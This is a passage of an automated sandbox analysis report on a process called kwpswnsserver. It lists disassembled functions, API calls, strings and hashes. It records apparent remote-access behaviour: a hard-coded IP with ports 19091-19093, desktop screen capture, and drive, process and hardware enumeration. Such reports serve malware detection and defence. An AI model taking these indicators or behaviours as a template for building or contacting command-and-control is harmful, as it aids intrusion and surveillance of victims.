                                                                  • Instruction Fuzzy Hash: 78F1A5B1B50304BFEB24DB64DC45FDAB7B8EF44704F004998E60AA7181EA74BA85CF65
                                                                  Function 0427DF10 Relevance: 61.6, APIs: 24, Strings: 11, Instructions: 354sleepregistrysynchronizationCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 300 427df10-427df72 call 4280542 Sleep 303 427df97-427df9d 300->303 304 427df74-427df91 call 427f707 call 427fa29 CloseHandle 300->304 306 427dfa4-427e019 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 427fa29 CloseHandle call 427f707 303->306 307 427df9f call 4277620 303->307 304->303 316 427e01b-427e026 call 4272c90 306->316 317 427e028 306->317 307->306 319 427e02c-427e046 call 427f707 316->319 317->319 323 427e054 319->323 324 427e048-427e049 call 4279730 319->324 326 427e058 323->326 327 427e04e-427e052 324->327 328 427e063-427e06f call 427ce00 326->328 327->326 331 427e071-427e0b7 call 427f876 * 2 328->331 332 427e0b9-427e0fa call 427f876 * 2 328->332 341 427e100-427e110 331->341 332->341 342 427e152-427e15a 341->342 343 427e112-427e14c call 427ce00 call 427f876 * 2 341->343 344 427e162-427e169 342->344 345 427e15c-427e15e 342->345 343->342 347 427e177-427e17b 344->347 348 427e16b-427e175 344->348 345->344 350 427e181-427e187 347->350 348->350 352 427e1c6-427e1ee call 4280542 call 4272da0 350->352 353 427e189-427e1a3 EnumWindows 350->353 361 427e200-427e2ac call 4280542 CreateEventA call 427f876 call 427ca70 352->361 362 427e1f0-427e1fb Sleep 352->362 353->352 355 427e1a5-427e1c4 Sleep EnumWindows 353->355 355->352 355->355 370 427e2b7-427e2bd 361->370 362->328 371 427e2bf-427e2f3 Sleep RegOpenKeyExW 370->371 372 427e318-427e32c call 4275430 370->372 373 427e2f5-427e30b RegQueryValueExW 371->373 374 427e311-427e316 371->374 376 427e331-427e337 372->376 373->374 374->370 374->372 377 427e36a-427e370 376->377 378 427e339-427e365 CloseHandle 376->378 379 427e372-427e38e call 427fa29 377->379 380 427e390 377->380 378->328 383 427e394 379->383 380->383 385 427e396-427e39d 383->385 386 427e39f-427e3ae Sleep 385->386 387 427e40d-427e420 385->387 386->385 388 427e3b0-427e3b7 386->388 391 427e432-427e46c call 4280542 Sleep CloseHandle 387->391 392 427e422-427e42c WaitForSingleObject CloseHandle 387->392 388->387 390 427e3b9-427e3cb 388->390 396 427e3dd-427e408 Sleep CloseHandle 390->396 397 427e3cd-427e3d7 WaitForSingleObject CloseHandle 390->397 391->328 392->391 396->328 397->396
                                                                  APIs
                                                                    • Part of subcall function 04280542: __fassign.LIBCMT ref: 04280538
                                                                  • Sleep.KERNEL32(00000000), ref: 0427DF64
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0427DF91
                                                                  • GetLocalTime.KERNEL32(?), ref: 0427DFA9
                                                                  • wsprintfW.USER32 ref: 0427DFE0
                                                                  • SetUnhandledExceptionFilter.KERNEL32(042775B0), ref: 0427DFEE
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0427E007
                                                                    • Part of subcall function 0427F707: _malloc.LIBCMT ref: 0427F721
                                                                  • EnumWindows.USER32(04275CC0,?), ref: 0427E19D
                                                                  • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0427E1AA
                                                                  • EnumWindows.USER32(04275CC0,?), ref: 0427E1BE
                                                                  • Sleep.KERNEL32(00000BB8), ref: 0427E1F5
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0427E241
                                                                  • Sleep.KERNEL32(00000FA0), ref: 0427E2C4
                                                                  • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0427E2EB
                                                                  • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0427E30B
                                                                  • CloseHandle.KERNEL32(?), ref: 0427E35D
                                                                  • Sleep.KERNEL32(000003E8,?,?), ref: 0427E3A4
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0427E3D0
                                                                  • CloseHandle.KERNEL32(?,?,?), ref: 0427E3D7
                                                                  • Sleep.KERNEL32(000003E8,?,?), ref: 0427E3E2
                                                                  • CloseHandle.KERNEL32(?), ref: 0427E400
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0427E425
                                                                  • CloseHandle.KERNEL32(?,?,?), ref: 0427E42C
                                                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 0427E446
                                                                  • CloseHandle.KERNEL32(?), ref: 0427E464
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                  • String ID: %4d.%2d.%2d-%2d:%2d:%2d$118.107.44.219$118.107.44.219$118.107.44.219$118.107.44.219$19091$19091$19092$19093$Console$IpDatespecial
                                                                  • API String ID: 1511462596-472669843
                                                                  • Opcode ID: f70767650d9e6f638a1fd90599ea9aa8509a13e4c72ad7e3aace83995436a4fd
                                                                  • Instruction ID: fe8cf0488b959abdd0b41d412329f466320d163dbe35cbfeb6bf604a2bad58cb
                                                                  • Opcode Fuzzy Hash: f70767650d9e6f638a1fd90599ea9aa8509a13e4c72ad7e3aace83995436a4fd
                                                                  • Instruction Fuzzy Hash: 1DD1C3B0B58301EFD320DF68E889A2A77E4FBC4B14F014A1CF55596280DF75AC54CB66
                                                                  Function 0427BC70 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 351windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 0427BC8F
                                                                  • GetDC.USER32(00000000), ref: 0427BC9C
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0427BCA2
                                                                  • GetDC.USER32(00000000), ref: 0427BCAD
                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 0427BCBA
                                                                  • GetDeviceCaps.GDI32(00000000,00000076), ref: 0427BCC2
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0427BCD3
                                                                  • GetSystemMetrics.USER32(0000004E), ref: 0427BCF8
                                                                  • GetSystemMetrics.USER32(0000004F), ref: 0427BD26
                                                                  • GetSystemMetrics.USER32(0000004C), ref: 0427BD78
                                                                  • GetSystemMetrics.USER32(0000004D), ref: 0427BD8D
                                                                  • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0427BDA6
                                                                  • SelectObject.GDI32(?,00000000), ref: 0427BDB4
                                                                  • SetStretchBltMode.GDI32(?,00000003), ref: 0427BDC0
                                                                  • GetSystemMetrics.USER32(0000004F), ref: 0427BDCD
                                                                  • GetSystemMetrics.USER32(0000004E), ref: 0427BDE0
                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0427BE07
                                                                  • _memset.LIBCMT ref: 0427BE7A
                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 0427BE97
                                                                  • _memset.LIBCMT ref: 0427BEAF
                                                                    • Part of subcall function 0427F707: _malloc.LIBCMT ref: 0427F721
                                                                  • DeleteObject.GDI32(?), ref: 0427BF23
                                                                  • DeleteObject.GDI32(?), ref: 0427BF2D
                                                                  • ReleaseDC.USER32(00000000,?), ref: 0427BF39
                                                                  • DeleteObject.GDI32(?), ref: 0427BFDF
                                                                  • DeleteObject.GDI32(?), ref: 0427BFE9
                                                                  • ReleaseDC.USER32(00000000,?), ref: 0427BFF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                  • String ID: ($6$gfff$gfff
                                                                  • API String ID: 3293817703-713438465
                                                                  • Opcode ID: 63b32f36ad404ef928f77a8d0c29881e26ea75af22bc6a5b41b6d3700c3fb85d
                                                                  • Instruction ID: f37e0d115d7ac99f5b6063ef51bc87461d4a34e23dd6a25b69abad2a5e944549
                                                                  • Opcode Fuzzy Hash: 63b32f36ad404ef928f77a8d0c29881e26ea75af22bc6a5b41b6d3700c3fb85d
                                                                  • Instruction Fuzzy Hash: FFD17BB1E11318AFDB14DFA9E885A9EBBB9FF48304F104529F505AB240DB74AD05CBA1
                                                                  Function 004A9A30 Relevance: 30.5, APIs: 5, Strings: 12, Instructions: 728COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 622 4a9a30-4a9a5f call 4a4d40 625 4a9acc-4a9b4a call 4a3540 call 4a2680 call 4a3540 call 4a5a30 622->625 626 4a9a61-4a9a6c 622->626 641 4a9b79-4a9b80 625->641 642 4a9b4c-4a9b59 625->642 628 4a9a6e-4a9a9a call 4b2b30 626->628 629 4a9a9c-4a9ab2 call 4a58b0 626->629 635 4a9ab7-4a9ac6 SetCurrentDirectoryW 628->635 629->635 635->625 645 4a9baf-4a9bcb 641->645 646 4a9b82-4a9b8f 641->646 643 4a9b5b-4a9b69 642->643 644 4a9b6f-4a9b76 call 4b13bb 642->644 643->644 649 4aa489-4aa4a7 call 4b5859 643->649 644->641 647 4a9bfa-4a9c23 GetCommandLineW CommandLineToArgvW call 4a1150 645->647 648 4a9bcd-4a9bda 645->648 651 4a9b91-4a9b9f 646->651 652 4a9ba5-4a9bac call 4b13bb 646->652 664 4a9c29-4a9c2b 647->664 665 4a9d01-4a9d2d MddBootstrapInitialize2 647->665 655 4a9bdc-4a9bea 648->655 656 4a9bf0-4a9bf7 call 4b13bb 648->656 651->649 651->652 652->645 655->649 655->656 656->647 664->665 668 4a9c31 664->668 666 4a9d33-4a9da3 call 4a3540 * 2 call 4a5a30 665->666 667 4a9e46-4a9e4f call 4a1680 665->667 699 4a9dd2-4a9ddc 666->699 700 4a9da5-4a9db2 666->700 677 4a9f30-4a9f5b call 4a1720 667->677 678 4a9e55-4a9ec5 call 4a3540 * 2 call 4a5a30 667->678 671 4a9c33-4a9c38 668->671 674 4a9c3e-4a9c50 call 4b5663 671->674 675 4a9cf6-4a9cfb 671->675 684 4a9c5b-4a9c6f call 4b5663 674->684 685 4a9c52-4a9c56 674->685 675->665 675->671 690 4a9f61-4a9fa9 call 4a3540 * 2 call 4a5a30 677->690 691 4aa014-4aa016 677->691 729 4a9ec7-4a9ed4 678->729 730 4a9ef4-4a9efe 678->730 684->675 703 4a9c75-4a9c8d 684->703 685->675 761 4a9fab-4a9fb8 690->761 762 4a9fd8-4a9fe2 690->762 696 4aa23c-4aa284 call 4a3540 * 2 call 4a5a30 691->696 697 4aa01c-4aa064 call 4a3540 * 2 call 4a5a30 691->697 769 4aa2b3-4aa2bd 696->769 770 4aa286-4aa293 696->770 776 4aa093-4aa09d 697->776 777 4aa066-4aa073 697->777 701 4a9e0b-4a9e0f 699->701 702 4a9dde-4a9deb 699->702 708 4a9dc8-4a9dcf call 4b13bb 700->708 709 4a9db4-4a9dc2 700->709 713 4aa3eb-4aa3ed 701->713 714 4a9e15-4a9e29 call 4ae5b0 call 4addf0 701->714 710 4a9ded-4a9dfb 702->710 711 4a9e01-4a9e08 call 4b13bb 702->711 712 4a9c90-4a9c99 703->712 708->699 709->708 710->711 711->701 712->712 724 4a9c9b-4a9cbd call 4a3100 call 4a1ad0 712->724 721 4aa0ce-4aa0d9 713->721 722 4aa3f3-4aa3fc 713->722 767 4a9e2b-4a9e2f call 4ac6d0 714->767 768 4a9e34-4a9e36 714->768 738 4aa0e0-4aa101 721->738 733 4aa400-4aa421 722->733 789 4a9cbf-4a9cd2 724->789 790 4a9cf2 724->790 741 4a9eea-4a9ef1 call 4b13bb 729->741 742 4a9ed6-4a9ee4 729->742 731 4aa3d8-4aa3e9 call 4aa4b0 730->731 732 4a9f04-4a9f11 730->732 731->713 744 4aa3ce-4aa3d5 call 4b13bb 732->744 745 4a9f17-4a9f2b 732->745 733->733 746 4aa423 733->746 738->738 750 4aa103-4aa104 738->750 741->730 742->741 744->731 745->744 756 4aa107-4aa128 746->756 750->756 771 4aa12a-4aa132 call 4a3540 756->771 772 4aa137-4aa189 call 4a2570 call 4a3540 call 4a5a30 756->772 774 4a9fba-4a9fc8 761->774 775 4a9fce-4a9fd5 call 4b13bb 761->775 762->731 765 4a9fe8-4a9ff5 762->765 765->744 784 4a9ffb-4aa00f 765->784 767->768 768->722 778 4a9e3c-4a9e41 768->778 782 4aa2bf-4aa2cc 769->782 783 4aa2ec-4aa2fa call 4af4b0 call 4a1210 769->783 792 4aa2a9-4aa2b0 call 4b13bb 770->792 793 4aa295-4aa2a3 770->793 771->772 822 4aa18b-4aa198 772->822 823 4aa1b8-4aa1bf 772->823 774->775 775->762 787 4aa09f-4aa0ac 776->787 788 4aa0cc 776->788 785 4aa089-4aa090 call 4b13bb 777->785 786 4aa075-4aa083 777->786 778->722 797 4aa2ce-4aa2dc 782->797 798 4aa2e2-4aa2e9 call 4b13bb 782->798 783->721 821 4aa300-4aa370 call 4a3540 * 2 call 4a5a30 783->821 784->744 785->776 786->785 802 4aa0ae-4aa0bc 787->802 803 4aa0c2-4aa0c9 call 4b13bb 787->803 788->721 804 4a9ce8-4a9cef call 4b13bb 789->804 805 4a9cd4-4a9ce2 789->805 790->675 792->769 793->792 797->798 798->783 802->803 803->788 804->790 805->649 805->804 855 4aa39f-4aa3a9 821->855 856 4aa372-4aa37f 821->856 825 4aa19a-4aa1a8 822->825 826 4aa1ae-4aa1b5 call 4b13bb 822->826 827 4aa1ee-4aa20a 823->827 828 4aa1c1-4aa1ce 823->828 825->826 826->823 834 4aa432-4aa43f MddBootstrapShutdown 827->834 835 4aa210-4aa21d 827->835 831 4aa1d0-4aa1de 828->831 832 4aa1e4-4aa1eb call 4b13bb 828->832 831->832 832->827 836 4aa470-4aa486 call 4b138a 834->836 837 4aa441-4aa454 834->837 841 4aa428-4aa42f call 4b13bb 835->841 842 4aa223-4aa237 835->842 844 4aa466-4aa46d call 4b13bb 837->844 845 4aa456-4aa464 837->845 841->834 842->841 844->836 845->844 855->731 859 4aa3ab-4aa3b8 855->859 857 4aa381-4aa38f 856->857 858 4aa395-4aa39c call 4b13bb 856->858 857->858 858->855 859->744 861 4aa3ba-4aa3c8 859->861 861->744
                                                                  APIs
                                                                    • Part of subcall function 004A4D40: RegOpenKeyExW.KERNEL32(80000001,Software\kingsoft\Office\6.0\Common,00000000,00020019,?,?,?,00000000), ref: 004A4D9A
                                                                    • Part of subcall function 004A4D40: RegQueryValueExW.ADVAPI32(?,InstallRoot,00000000,00000000,?,00000200,?,?,00000000), ref: 004A4DC1
                                                                    • Part of subcall function 004A4D40: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004A4DD1
                                                                    • Part of subcall function 004A4D40: RegOpenKeyExW.KERNEL32(80000002,Software\kingsoft\Office\6.0\Common,00000000,00020019,?,?,?,00000000), ref: 004A4DEF
                                                                    • Part of subcall function 004A4D40: RegQueryValueExW.ADVAPI32(?,InstallRoot,00000000,00000000,?,00000200,?,?,00000000), ref: 004A4E16
                                                                    • Part of subcall function 004A4D40: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004A4E40
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000008,00000000), ref: 004A9AC6
                                                                  • GetCommandLineW.KERNEL32(WinMain,00000007), ref: 004A9BFA
                                                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 004A9C06
                                                                  • MddBootstrapInitialize2.MICROSOFT.WINDOWSAPPRUNTIME.BOOTSTRAP(00010005,004DCC70,?,?,00000000), ref: 004A9D1E
                                                                  • MddBootstrapShutdown.MICROSOFT.WINDOWSAPPRUNTIME.BOOTSTRAP(?,?,?,?,?,?,?,?,?,?,WinMain,00000007), ref: 004AA432
                                                                    • Part of subcall function 004A5A30: RegOpenKeyExW.KERNEL32(80000001,Software\kingsoft\Office\6.0\plugins\messagepushcenter\wns,00000000,00020019,?,EED03960,?,?), ref: 004A5A94
                                                                    • Part of subcall function 004A5A30: RegQueryValueExW.ADVAPI32(?,log,00000000,?,?,?), ref: 004A5ABF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3558864422.00000000004A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004A0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3558823117.00000000004A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3558976514.00000000004D1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3559020450.00000000004E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3559071612.00000000004E4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3559112097.00000000004E6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3559153425.00000000004E8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4a0000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: OpenQueryValue$BootstrapCloseCommandLine$ArgvCurrentDirectoryInitialize2.Shutdown.
                                                                  • String ID: Run over, res is:$Run start, cmd is:$WinMain$\office6$check_mode$checkrt$cmd=$pull_notification$register_mode$runtime not support$unregister_mode$wake_mode
                                                                  • API String ID: 1605902879-3153828214
                                                                  • Opcode ID: a4a4d6b0e3efc47983e93d25bc42c1b53f60b9cc4d3cad98e774219a28c0cecb
                                                                  • Instruction ID: 45e265d349df53a2215562e3f2a50aa64573ddfe6fd22e32da945219a8b01b4d
                                                                  • Opcode Fuzzy Hash: a4a4d6b0e3efc47983e93d25bc42c1b53f60b9cc4d3cad98e774219a28c0cecb
                                                                  • Instruction Fuzzy Hash: 184215312043409BE718CF28C995B6FB7E2ABD6304F608A1EF495872D5EB7CD944CB5A
                                                                  Function 042780F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 04278132
                                                                  • lstrcmpiW.KERNEL32(?,A:\), ref: 04278166
                                                                  • lstrcmpiW.KERNEL32(?,B:\), ref: 04278176
                                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 042781A6
                                                                  • lstrlenW.KERNEL32(?), ref: 042781B7
                                                                  • __wcsnicmp.LIBCMT ref: 042781CE
                                                                  • lstrcpyW.KERNEL32(00000AD4,?), ref: 04278204
                                                                  • lstrcpyW.KERNEL32(?,?), ref: 04278228
                                                                  • lstrcatW.KERNEL32(?,00000000), ref: 04278233
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                  • String ID: A:\$B:\
                                                                  • API String ID: 950920757-1009255891
                                                                  • Opcode ID: cfe80d7106e1cad5c982da9071dda78b94933ce3908ceb48981368e3d75b7ea5
                                                                  • Instruction ID: e91e0b5ca41ba039891b2fe3d985cb94152510e25474324b1ed33e9e680c3e5f
                                                                  • Opcode Fuzzy Hash: cfe80d7106e1cad5c982da9071dda78b94933ce3908ceb48981368e3d75b7ea5
                                                                  • Instruction Fuzzy Hash: 9441AB71B11219EBDB20DF65DD48AEEB3B8EF44710F0045D9DA09A3140EF74AE45CBA4
                                                                  Function 04276C50 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 04276C8B
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 04276CAA
                                                                  • _memset.LIBCMT ref: 04276CE1
                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 04276CF4
                                                                  • swprintf.LIBCMT ref: 04276D39
                                                                  • swprintf.LIBCMT ref: 04276D4C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                  • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                  • API String ID: 3202570353-3501811827
                                                                  • Opcode ID: 7b1ff638f287d95c15c1b926f07ab727defc875235da0c2325618d1210eb3c92
                                                                  • Instruction ID: f7ebe7a4036cd5b5d15a2751e905b5a489bbca073e370b66581af079a0d64f17
                                                                  • Opcode Fuzzy Hash: 7b1ff638f287d95c15c1b926f07ab727defc875235da0c2325618d1210eb3c92
                                                                  • Instruction Fuzzy Hash: CB313EB2E1021CABDB14CFE9DC45BEEB7B9FB48700F50421DE91AA7241EA746D45CB90
                                                                  Function 04276EE0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateDXGIFactory.DXGI(0429579C,?,5EF26BF0,74DEDF80,00000000,75BF73E0), ref: 04276F4A
                                                                  • swprintf.LIBCMT ref: 0427711E
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 042771C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                  • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                  • API String ID: 3803070356-257307503
                                                                  • Opcode ID: 4875b63688032a6a54f740ea0ae11c72ec41c29b163a84073ecbf54e2997fddb
                                                                  • Instruction ID: bbf563e33cf11b8dbfd1d3d7fbe6151d58489df8daf2f0d35a1e3fe75dab0169
                                                                  • Opcode Fuzzy Hash: 4875b63688032a6a54f740ea0ae11c72ec41c29b163a84073ecbf54e2997fddb
                                                                  • Instruction Fuzzy Hash: 7CE18571B112259FDF24CE64CC90BEEB3B5AB85700F1445E9E91AE7284D770BE818F91
                                                                  Function 6C8600A0 Relevance: 9.5, APIs: 6, Instructions: 508encryptionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CryptAcquireContextW.ADVAPI32 ref: 6C86012A
                                                                  • CryptCreateHash.ADVAPI32 ref: 6C8601D4
                                                                    • Part of subcall function 6C9C21A1: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C89D2F4,FFFFFFFF,-00000001,?,?,6C89D2F4,?,6CA3FDBC,?), ref: 6C9C2202
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Crypt$AcquireContextCreateExceptionHashRaise
                                                                  • String ID:
                                                                  • API String ID: 333276693-0
                                                                  • Opcode ID: 370490bb4285b74862e1b999532ca28eaf533dbb987cce3f3277b70ba3d23fc8
                                                                  • Instruction ID: 37bbbb3fd9373b2ac72052825beddbc7e664f4bd3ddd7f52241058074dcb2c08
                                                                  • Opcode Fuzzy Hash: 370490bb4285b74862e1b999532ca28eaf533dbb987cce3f3277b70ba3d23fc8
                                                                  • Instruction Fuzzy Hash: D93211B5904358CFDB24EF68DA557DDBBB0BF49304F0085A9D80997750DB30AA48CF96
                                                                  Function 04276050 Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0427607C
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 04276088
                                                                  • Process32FirstW.KERNEL32(00000000,00000000), ref: 042760B9
                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0427610F
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 04276116
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                  • String ID:
                                                                  • API String ID: 2526126748-0
                                                                  • Opcode ID: 149090585ffad8168d8fe05f956de71b5dcac52ecf793c16cddbb2f0e09cef9e
                                                                  • Instruction ID: e3a328ffccf3898e68492ed24d572a8bb5d58236a9216ad1e60f5eafb8975e52
                                                                  • Opcode Fuzzy Hash: 149090585ffad8168d8fe05f956de71b5dcac52ecf793c16cddbb2f0e09cef9e
                                                                  • Instruction Fuzzy Hash: 0221B731B25115ABDB20EF68EC59BEA7365FF15324F004699DD0997281EF35AE10C660
                                                                  Function 6C861100 Relevance: 7.9, APIs: 5, Instructions: 405encryptionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C85FDE0: CryptStringToBinaryA.CRYPT32 ref: 6C85FE60
                                                                    • Part of subcall function 6C85FDE0: CryptStringToBinaryA.CRYPT32 ref: 6C85FF07
                                                                  • CryptAcquireContextW.ADVAPI32 ref: 6C861349
                                                                  • CryptImportKey.ADVAPI32 ref: 6C861417
                                                                  • CryptSetKeyParam.ADVAPI32 ref: 6C8614A2
                                                                  • CryptSetKeyParam.ADVAPI32 ref: 6C861549
                                                                    • Part of subcall function 6C9C21A1: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C89D2F4,FFFFFFFF,-00000001,?,?,6C89D2F4,?,6CA3FDBC,?), ref: 6C9C2202
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
